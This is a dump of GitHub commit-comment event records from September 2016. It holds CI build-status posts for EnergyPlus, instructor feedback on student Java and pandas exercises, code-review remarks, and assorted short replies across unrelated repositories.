{"id":"4571893042","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047802,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T02:37:44Z","updated_at":"2016-09-16T02:37:44Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2370 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T02:37:44Z"}
{"id":"4571893207","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19047804,"position":38,"line":38,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-16T02:37:49Z","updated_at":"2016-09-16T02:37:49Z","body":"Done."}},"created_at":"2016-09-16T02:37:49Z"}
{"id":"4571893621","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19047808,"position":5,"line":67,"path":"app/templates/home.html","commit_id":"fda8332eee628a841f7b58157153219124ac9a5d","created_at":"2016-09-16T02:38:00Z","updated_at":"2016-09-16T02:38:00Z","body":"Use this new 'property' of user to show the image on template. It handles if the user has no image."}},"created_at":"2016-09-16T02:38:00Z"}
{"id":"4571893754","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19047809,"position":43,"line":43,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-16T02:38:04Z","updated_at":"2016-09-16T02:38:04Z","body":"Done."}},"created_at":"2016-09-16T02:38:04Z"}
{"id":"4571895004","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19047812,"position":50,"line":50,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-16T02:38:38Z","updated_at":"2016-09-16T02:38:38Z","body":"Done."}},"created_at":"2016-09-16T02:38:38Z"}
{"id":"4571897523","type":"CommitCommentEvent","actor":{"login":"IAGAdmin"},"repo":{"name":"indautgrp/erpnext"},"payload":{"comment":{"id":19047817,"position":null,"line":null,"path":null,"commit_id":"5023ed68862e88390cada750eccdbbef66d26ac7","created_at":"2016-09-16T02:39:44Z","updated_at":"2016-09-16T02:39:44Z","body":"https://github.com/indautgrp/iag_custom/issues/31"}},"created_at":"2016-09-16T02:39:44Z"}
{"id":"4571898236","type":"CommitCommentEvent","actor":{"login":"IAGAdmin"},"repo":{"name":"indautgrp/erpnext"},"payload":{"comment":{"id":19047819,"position":null,"line":null,"path":null,"commit_id":"fe01408283b0a0a8667214fcb1f5a58162ad7507","created_at":"2016-09-16T02:40:04Z","updated_at":"2016-09-16T02:40:04Z","body":"https://github.com/indautgrp/iag_custom/issues/31"}},"created_at":"2016-09-16T02:40:04Z"}
{"id":"4571902020","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19047831,"position":31,"line":450,"path":"js/src/test/scala/BrowserTestSuite.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-16T02:41:44Z","updated_at":"2016-09-16T02:41:44Z","body":"Yes"}},"created_at":"2016-09-16T02:41:44Z"}
{"id":"4571903377","type":"CommitCommentEvent","actor":{"login":"urbanblight"},"repo":{"name":"urbanblight/node-express-chatapp"},"payload":{"comment":{"id":19047834,"position":7,"line":7,"path":"api.js","commit_id":"454c09b7a61bf840fb7bfebd9fb40f4419ab250c","created_at":"2016-09-16T02:42:23Z","updated_at":"2016-09-16T02:42:23Z","body":"This is a slight variation from the example, but I prefer the chained syntax."}},"created_at":"2016-09-16T02:42:23Z"}
{"id":"4571904004","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jlemke"},"payload":{"comment":{"id":19047838,"position":18,"line":55,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"2638226f7beccd74a24297b50115115c71656212","created_at":"2016-09-16T02:42:39Z","updated_at":"2016-09-16T02:42:39Z","body":"Missing exception test."}},"created_at":"2016-09-16T02:42:39Z"}
{"id":"4571904142","type":"CommitCommentEvent","actor":{"login":"Shreeesha"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19047840,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-16T02:42:42Z","updated_at":"2016-09-16T02:42:42Z","body":"Hilarious shit on the internet. Googled about you\r\n\r\n![img_20160916_080959](https://cloud.githubusercontent.com/assets/10357862/18573862/329c1032-7be5-11e6-9735-4a64ef288efc.jpg)\r\n"}},"created_at":"2016-09-16T02:42:42Z"}
{"id":"4571904385","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047842,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T02:42:49Z","updated_at":"2016-09-16T02:42:49Z","body":"makingPrettyTransition (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2363 of 2370 tests passed, 3 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T02:42:49Z"}
{"id":"4571905428","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jlemke"},"payload":{"comment":{"id":19047845,"position":72,"line":72,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"2638226f7beccd74a24297b50115115c71656212","created_at":"2016-09-16T02:43:19Z","updated_at":"2016-09-16T02:43:19Z","body":"Good this is the correct answer"}},"created_at":"2016-09-16T02:43:19Z"}
{"id":"4571907328","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jlemke"},"payload":{"comment":{"id":19047852,"position":50,"line":50,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"2638226f7beccd74a24297b50115115c71656212","created_at":"2016-09-16T02:44:11Z","updated_at":"2016-09-16T02:44:11Z","body":"System.err will print to the console. Remember to use log4j."}},"created_at":"2016-09-16T02:44:11Z"}
{"id":"4571907887","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":19047856,"position":null,"line":null,"path":null,"commit_id":"585e7a64100a3d2c244c9ca65aa31022bdf88fff","created_at":"2016-09-16T02:44:26Z","updated_at":"2016-09-16T02:44:26Z","body":"one"}},"created_at":"2016-09-16T02:44:26Z"}
{"id":"4571907936","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047857,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T02:44:27Z","updated_at":"2016-09-16T02:44:27Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T02:44:27Z"}
{"id":"4571908496","type":"CommitCommentEvent","actor":{"login":"wesleycoder"},"repo":{"name":"wesleycoder/learn-rollup"},"payload":{"comment":{"id":19047862,"position":22,"line":24,"path":"src/scripts/main.js","commit_id":"4f5403b1d3f3ddbd58e5e14f812a6c855e786f0a","created_at":"2016-09-16T02:44:43Z","updated_at":"2016-09-16T02:44:43Z","body":"Just for style points."}},"created_at":"2016-09-16T02:44:43Z"}
{"id":"4571908893","type":"CommitCommentEvent","actor":{"login":"IAGAdmin"},"repo":{"name":"indautgrp/erpnext"},"payload":{"comment":{"id":19047864,"position":null,"line":null,"path":null,"commit_id":"fd953e8f1867d233ca272a7c59529777ce6342b3","created_at":"2016-09-16T02:44:54Z","updated_at":"2016-09-16T02:44:54Z","body":"https://github.com/indautgrp/iag_custom/issues/44"}},"created_at":"2016-09-16T02:44:54Z"}
{"id":"4571910393","type":"CommitCommentEvent","actor":{"login":"wesleycoder"},"repo":{"name":"wesleycoder/learn-rollup"},"payload":{"comment":{"id":19047867,"position":22,"line":24,"path":"src/scripts/main.js","commit_id":"4f5403b1d3f3ddbd58e5e14f812a6c855e786f0a","created_at":"2016-09-16T02:45:36Z","updated_at":"2016-09-16T02:45:36Z","body":"Just for style points."}},"created_at":"2016-09-16T02:45:36Z"}
{"id":"4571910872","type":"CommitCommentEvent","actor":{"login":"lnbailey"},"repo":{"name":"nss-evening-cohort-04/chatty-chatty-kathy-s"},"payload":{"comment":{"id":19047870,"position":null,"line":null,"path":null,"commit_id":"e0f45ad20188c93db915097183a6351de32b92e1","created_at":"2016-09-16T02:45:50Z","updated_at":"2016-09-16T02:45:50Z","body":"👍 "}},"created_at":"2016-09-16T02:45:50Z"}
{"id":"4571911822","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-TheJohnHanson"},"payload":{"comment":{"id":19047874,"position":7,"line":7,"path":"logs/MyApp.log","commit_id":"c9a634a81af34cc196cafe6341b2ef2c21ad5bfb","created_at":"2016-09-16T02:46:17Z","updated_at":"2016-09-16T02:46:17Z","body":"good work - this is the correct answer."}},"created_at":"2016-09-16T02:46:17Z"}
{"id":"4571913188","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-TheJohnHanson"},"payload":{"comment":{"id":19047879,"position":24,"line":54,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"c9a634a81af34cc196cafe6341b2ef2c21ad5bfb","created_at":"2016-09-16T02:46:56Z","updated_at":"2016-09-16T02:46:56Z","body":"Remember, if you are not using try-with-resources, you should close the file in the finally. "}},"created_at":"2016-09-16T02:46:56Z"}
{"id":"4571914385","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-TheJohnHanson"},"payload":{"comment":{"id":19047885,"position":24,"line":60,"path":"src/test/java/edu/madisoncollege/entjava/ListTest.java","commit_id":"c9a634a81af34cc196cafe6341b2ef2c21ad5bfb","created_at":"2016-09-16T02:47:29Z","updated_at":"2016-09-16T02:47:29Z","body":"Good exception testing."}},"created_at":"2016-09-16T02:47:29Z"}
{"id":"4571915260","type":"CommitCommentEvent","actor":{"login":"student50"},"repo":{"name":"student50/tmp"},"payload":{"comment":{"id":19047889,"position":null,"line":null,"path":null,"commit_id":"f20f413ceffdbbede97232597af07e0ccc760078","created_at":"2016-09-16T02:47:53Z","updated_at":"2016-09-16T02:47:53Z","body":"one"}},"created_at":"2016-09-16T02:47:53Z"}
{"id":"4571915274","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047890,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T02:47:53Z","updated_at":"2016-09-16T02:47:53Z","body":"makingPrettyTransition (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T02:47:53Z"}
{"id":"4571916100","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-TheJohnHanson"},"payload":{"comment":{"id":19047891,"position":16,"line":16,"path":"src/test/java/edu/madisoncollege/entjava/SantaInAnElevatorTest.java","commit_id":"c9a634a81af34cc196cafe6341b2ef2c21ad5bfb","created_at":"2016-09-16T02:48:15Z","updated_at":"2016-09-16T02:48:15Z","body":"Generally we should have one test method per method in the class you are testing (at minimum).  What was your code coverage %? How could you improve that %?"}},"created_at":"2016-09-16T02:48:15Z"}
{"id":"4571916757","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19047892,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T02:48:31Z","updated_at":"2016-09-16T02:48:31Z","body":"Ive tested a few things and it looks like it is just the city sabina and some streets. When the player swims in the ground after login, a simple relog fixed that problem.  Setting from .+1 to .+5 does not work. It seems that the login is too fast. Im performing the action to prevent swimming before I really swim in the ground. It does not happend when I stand or crouch only when Im prone. "}},"created_at":"2016-09-16T02:48:31Z"}
{"id":"4571917522","type":"CommitCommentEvent","actor":{"login":"wesleycoder"},"repo":{"name":"wesleycoder/learn-rollup"},"payload":{"comment":{"id":19047893,"position":16,"line":20,"path":".eslintrc.json","commit_id":"4f5403b1d3f3ddbd58e5e14f812a6c855e786f0a","created_at":"2016-09-16T02:48:51Z","updated_at":"2016-09-16T02:48:51Z","body":"These guys ate half of an hour of my day."}},"created_at":"2016-09-16T02:48:51Z"}
{"id":"4571918741","type":"CommitCommentEvent","actor":{"login":"wesleycoder"},"repo":{"name":"wesleycoder/learn-rollup"},"payload":{"comment":{"id":19047895,"position":17,"line":21,"path":".eslintrc.json","commit_id":"4f5403b1d3f3ddbd58e5e14f812a6c855e786f0a","created_at":"2016-09-16T02:49:26Z","updated_at":"2016-09-16T02:49:26Z","body":"These guys ate half of an hour of my day."}},"created_at":"2016-09-16T02:49:26Z"}
{"id":"4571918876","type":"CommitCommentEvent","actor":{"login":"japhb"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":19047896,"position":60,"line":436,"path":"lib/Test.pm6","commit_id":"63e535797adef2451241d55e26f6cd4345a67acd","created_at":"2016-09-16T02:49:30Z","updated_at":"2016-09-16T02:49:30Z","body":"Copy/paste error?"}},"created_at":"2016-09-16T02:49:30Z"}
{"id":"4571919971","type":"CommitCommentEvent","actor":{"login":"enriquearce00"},"repo":{"name":"TortoiseGit/tortoisesvn"},"payload":{"comment":{"id":19047901,"position":null,"line":null,"path":null,"commit_id":"8bf845d378d23e4d22489df5c3e66e8c44b1056f","created_at":"2016-09-16T02:50:01Z","updated_at":"2016-09-16T02:50:01Z","body":"\r\nFailed to compile \"TortoiseProc\".\r\n\r\nMissing library \"libsvn_tsvn32.lib\".\r\n\r\nWhere I can get the library mentioned above?\r\n\r\nThank you."}},"created_at":"2016-09-16T02:50:01Z"}
{"id":"4571922502","type":"CommitCommentEvent","actor":{"login":"enriquearce00"},"repo":{"name":"yuexiaoyun/tortoisesvn"},"payload":{"comment":{"id":19047906,"position":null,"line":null,"path":null,"commit_id":"51e9b36bba9061539c4d191c0e815422a8a8d040","created_at":"2016-09-16T02:51:14Z","updated_at":"2016-09-16T02:51:14Z","body":"Failed to compile \"TortoiseProc\".\r\n\r\nMissing library \"libsvn_tsvn32.lib\".\r\n\r\nWhere I can get the library mentioned above?\r\n\r\nThank you."}},"created_at":"2016-09-16T02:51:14Z"}
{"id":"4571923104","type":"CommitCommentEvent","actor":{"login":"yd-li"},"repo":{"name":"NYU-CS6313-SPRING2016/Group-5-StockTweets"},"payload":{"comment":{"id":19047907,"position":null,"line":null,"path":null,"commit_id":"b97516ae04ad290f66469661aecb4e58607abbaf","created_at":"2016-09-16T02:51:29Z","updated_at":"2016-09-16T02:51:29Z","body":"确实牛"}},"created_at":"2016-09-16T02:51:29Z"}
{"id":"4571931759","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047918,"position":null,"line":null,"path":null,"commit_id":"3541b84cd115abfee1586de561abb9fbd6ddde1e","created_at":"2016-09-16T02:55:22Z","updated_at":"2016-09-16T02:55:22Z","body":"Related to: backdrop/backdrop-issues#2100 "}},"created_at":"2016-09-16T02:55:22Z"}
{"id":"4571934544","type":"CommitCommentEvent","actor":{"login":"feeley"},"repo":{"name":"gambit/gambit"},"payload":{"comment":{"id":19047923,"position":null,"line":null,"path":null,"commit_id":"9c5e9dabdf3f3d766dfd2c0e98d459e2e40a1207","created_at":"2016-09-16T02:56:32Z","updated_at":"2016-09-16T02:56:32Z","body":"A macro is even better because it is always \"inlined\"."}},"created_at":"2016-09-16T02:56:32Z"}
{"id":"4571937102","type":"CommitCommentEvent","actor":{"login":"tacaswell"},"repo":{"name":"PyTables/PyTables"},"payload":{"comment":{"id":19047928,"position":null,"line":null,"path":null,"commit_id":"11bd422201b674b60fb46439f68eb28d74356e40","created_at":"2016-09-16T02:57:46Z","updated_at":"2016-09-16T02:57:46Z","body":"Possibly more interesting, why does pytables have a vendored version of numpydoc?"}},"created_at":"2016-09-16T02:57:46Z"}
{"id":"4571937883","type":"CommitCommentEvent","actor":{"login":"carilevay"},"repo":{"name":"jmwhalen/sfdat26-whalen"},"payload":{"comment":{"id":19047930,"position":null,"line":null,"path":null,"commit_id":"7d12a3c1bc7148c2fa9a9ee4008c5ff18fb41178","created_at":"2016-09-16T02:58:10Z","updated_at":"2016-09-16T02:58:10Z","body":"Businesses\r\n- #2 - Very creative -- you're the only person who solved it this way. Alternatively, you could do something like this:\r\nrestaurant_scores.groupby(\"name\").inspection_id.nunique().nlargest(10)\r\n- # 4 - You need matplotlib for this to work!\r\nimport matplotlib.pyplot as plt\r\n%matplotlib inline\r\nAlso, if you want to convert the date object (which is currently a string) into a datetime object, you need datetime:\r\nimport datetime as datetime\r\ninspections['date'] = inspections['date'].apply(lambda x: pd.to_datetime(str(x), format='%Y%m%d'))\r\ninspections['month'] = inspections.date.apply(lambda x: x.month)\r\ninspections.groupby('month').size().plot(kind='bar')\r\n# 6 - You could also use this to find the distribution:\r\nrestaurant_scores[restaurant_scores.type == 'New Ownership'].risk_category.value_counts(normalize=True)\r\n\r\nMorbid\r\n# 3 - .fillna() takes a parameter inplace=True, which makes sure that the actual data is getting changed instead of just the view\r\n# 5 - You can also use killings.gender.value_counts()\r\n# 7 - Taking it a step further, you could do something like:\r\na = len(killings.index) / float(len(killings.armed))\r\nprint \"{0:.2f}%\".format(a*100)\r\n- # 8 - You can sort the values by using .value_counts():\r\nkillings.state.value_counts()[:5]\r\n- # 9 - You can also use .value_counts() here instead of groupby to make it a little simpler:\r\nkillings.race.value_counts()\r\n- # 3 - You can also sort values by descending:\r\nmajors.groupby('Major').Median.mean().sort_values(ascending=False).head(10)\r\n- # 4 - Should be something like this: \r\nmajors[['Major','Median']].sort_values(by='Median', ascending=False)[:10].plot(kind='bar', x='Major', figsize=(10,6))\r\n"}},"created_at":"2016-09-16T02:58:10Z"}
{"id":"4576070920","type":"CommitCommentEvent","actor":{"login":"benbieler"},"repo":{"name":"Sententiaregum/sententiaregum-flux-react"},"payload":{"comment":{"id":19059590,"position":null,"line":null,"path":null,"commit_id":"e52a1108f472fa6e7e16a0f40450ef0cc95f1d79","created_at":"2016-09-16T20:01:29Z","updated_at":"2016-09-16T20:01:29Z","body":"@Ma27 Seems to be all fine. Thx. Good work. "}},"created_at":"2016-09-16T20:01:29Z"}
{"id":"4576076928","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"facelesspanda/almo"},"payload":{"comment":{"id":19059603,"position":null,"line":null,"path":null,"commit_id":"b9e587f7c762637fa4df5ba1a8f87e5fded41b79","created_at":"2016-09-16T20:02:35Z","updated_at":"2016-09-16T20:02:35Z","body":"j'ai trouvé le problème. L'exception sur xspim elle était pas claire, mais QtSpim débug mieux : on peut pas faire un `lw` sur une adresse non-alignée. Donc faut revoir l'idée ou l'implémentation du curseur."}},"created_at":"2016-09-16T20:02:35Z"}
{"id":"4576077884","type":"CommitCommentEvent","actor":{"login":"FadeMind"},"repo":{"name":"eloaders/I-Nex"},"payload":{"comment":{"id":19059605,"position":2,"line":14,"path":"I-Nex/i-nex/.project","commit_id":"a672d205561698eb261dc6bf70ed989659f5ec73","created_at":"2016-09-16T20:02:46Z","updated_at":"2016-09-16T20:02:46Z","body":"`LANG=C`\r\n\r\nhttp://superuser.com/questions/219945/why-lang-c-not-d-or-e-or-f\r\n\r\n@eloaders 😉 "}},"created_at":"2016-09-16T20:02:46Z"}
{"id":"4576082894","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19059618,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-16T20:03:52Z","updated_at":"2016-09-16T20:03:52Z","body":"I think the BOOTCONFIG above make the u-boot ftdfile pointing to inexisting DTB.\r\nhttp://forum.armbian.com/index.php/topic/2038-not-starting-after-update-to-520/\r\n"}},"created_at":"2016-09-16T20:03:52Z"}
{"id":"4576085804","type":"CommitCommentEvent","actor":{"login":"jbickar"},"repo":{"name":"SU-SWS/stanford_events_importer"},"payload":{"comment":{"id":19059626,"position":6,"line":432,"path":"stanford_events_importer.module","commit_id":"ad6575a2b2aa8371c46a24a22b827db78ccd476a","created_at":"2016-09-16T20:04:32Z","updated_at":"2016-09-16T20:04:32Z","body":"![cant-someone-else-do-it](https://cloud.githubusercontent.com/assets/821106/18599596/18e51d0e-7c0e-11e6-94ba-ab2a2c3bc306.jpg)\r\n"}},"created_at":"2016-09-16T20:04:32Z"}
{"id":"4576089631","type":"CommitCommentEvent","actor":{"login":"Fahrenhei7"},"repo":{"name":"Fahrenhei7/storyline"},"payload":{"comment":{"id":19059639,"position":null,"line":null,"path":null,"commit_id":"18ebe876f580c4123f83081c4f29b42f3944651a","created_at":"2016-09-16T20:05:25Z","updated_at":"2016-09-16T20:05:25Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DPeUNSBo&#x2F;1-create-rails-application\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Create Rails Application</a>"}},"created_at":"2016-09-16T20:05:25Z"}
{"id":"4576093863","type":"CommitCommentEvent","actor":{"login":"AngelesGarcia123"},"repo":{"name":"natyvictoriag/DCA-Semana7ProyectoI"},"payload":{"comment":{"id":19059655,"position":4,"line":3,"path":"DCAProyectoIntegrador/src/MainApp.java","commit_id":"928984fd01c95d63393caedc8ace3d8a029261da","created_at":"2016-09-16T20:06:22Z","updated_at":"2016-09-16T20:06:22Z","body":"Ohhh siii"}},"created_at":"2016-09-16T20:06:22Z"}
{"id":"4576097117","type":"CommitCommentEvent","actor":{"login":"martha-thomae"},"repo":{"name":"martha-thomae/ApelsAlgorithm"},"payload":{"comment":{"id":19059661,"position":null,"line":null,"path":null,"commit_id":"f47ea2ba2eb36ea28954d898ff4720a3e723ecb8","created_at":"2016-09-16T20:07:08Z","updated_at":"2016-09-16T20:07:08Z","body":"Only default cases are included by now."}},"created_at":"2016-09-16T20:07:08Z"}
{"id":"4576098552","type":"CommitCommentEvent","actor":{"login":"nickelization"},"repo":{"name":"basho/riak_test"},"payload":{"comment":{"id":19059669,"position":33,"line":476,"path":"src/rt.erl","commit_id":"e97f26878273a24682b3ed783ffa9b6b8c4157e1","created_at":"2016-09-16T20:07:26Z","updated_at":"2016-09-16T20:07:26Z","body":"Was this meant to be 10 like the other functions? Or then again, maybe we don't even need a single-argument version, since the only place `do_commit` gets called from is `plan_and_commit`."}},"created_at":"2016-09-16T20:07:26Z"}
{"id":"4576098675","type":"CommitCommentEvent","actor":{"login":"jryanconklin"},"repo":{"name":"jryanconklin/epicodus-php-cr2-word_frequency"},"payload":{"comment":{"id":19059671,"position":null,"line":null,"path":null,"commit_id":"607e01974bb408f6f85af1a6c6707d06233c8e1f","created_at":"2016-09-16T20:07:27Z","updated_at":"2016-09-16T20:07:27Z","body":"-Updated Views to Default Style\r\n-Adjusted CSS to Work with New Style\r\n-Added Silex to Route\r\n-Troubleshooted Issue with Routing for Multiple Inputs and Method Call\r\n-Add $count Variable to Class Constructor, Getter and Setter\r\n-Set Results to Table Using Bootstrap\r\n"}},"created_at":"2016-09-16T20:07:27Z"}
{"id":"4576100695","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19059683,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-16T20:07:48Z","updated_at":"2016-09-16T20:07:48Z","body":"I don't think a LTC test is needed for this too @mcostalba?\r\nBy the way, forget about my idea expressed above,  was just a crazy thougth leading to nowhere."}},"created_at":"2016-09-16T20:07:48Z"}
{"id":"4576100867","type":"CommitCommentEvent","actor":{"login":"nickelization"},"repo":{"name":"basho/riak_test"},"payload":{"comment":{"id":19059685,"position":36,"line":479,"path":"src/rt.erl","commit_id":"e97f26878273a24682b3ed783ffa9b6b8c4157e1","created_at":"2016-09-16T20:07:50Z","updated_at":"2016-09-16T20:07:50Z","body":"s/plan_and_commit/do_commit/"}},"created_at":"2016-09-16T20:07:50Z"}
{"id":"4576103816","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19059699,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T20:08:31Z","updated_at":"2016-09-16T20:08:31Z","body":"What is it that annoys you?"}},"created_at":"2016-09-16T20:08:31Z"}
{"id":"4576105933","type":"CommitCommentEvent","actor":{"login":"s4w3d0ff"},"repo":{"name":"s4w3d0ff/python-poloniex"},"payload":{"comment":{"id":19059710,"position":null,"line":null,"path":null,"commit_id":"dfcdcae40819f34f3f10cf1b719921ffe8eb1fc6","created_at":"2016-09-16T20:09:00Z","updated_at":"2016-09-16T20:09:00Z","body":"I couldn't get either of the above commands to work. \r\n\r\nI can't see how pip knows where the 'poloniex' package actually is (unless it becomes registered with pypi) and I got repo ownership/permission errors with the second one.\r\n\r\nBut `pip install git+https://github.com/s4w3d0ff/python-poloniex.git` works fine for me.\r\n\r\nThe release links should work as well:\r\n`pip install https://github.com/s4w3d0ff/python-poloniex/archive/v0.0.1.tar.gz`"}},"created_at":"2016-09-16T20:09:00Z"}
{"id":"4576105944","type":"CommitCommentEvent","actor":{"login":"nickelization"},"repo":{"name":"basho/riak_test"},"payload":{"comment":{"id":19059711,"position":54,"line":495,"path":"src/rt.erl","commit_id":"e97f26878273a24682b3ed783ffa9b6b8c4157e1","created_at":"2016-09-16T20:09:00Z","updated_at":"2016-09-16T20:09:00Z","body":"We should probably log something here."}},"created_at":"2016-09-16T20:09:00Z"}
{"id":"4576108620","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19059723,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T20:09:34Z","updated_at":"2016-09-16T20:09:34Z","body":"The indentation...\n\nOn Fri, Sep 16, 2016 at 4:08 PM, JoinRajuncraftNow <notifications@github.com\n> wrote:\n\n> What is it that annoys you?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/CSE/commit/aa4d28263c904937daf6d239377d556704d44f0a#commitcomment-19059699>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOnfZgh6u9epPZyKFGA7xWng48C1f-ks5qqvc_gaJpZM4J_M3N>\n> .\n>\n"}},"created_at":"2016-09-16T20:09:34Z"}
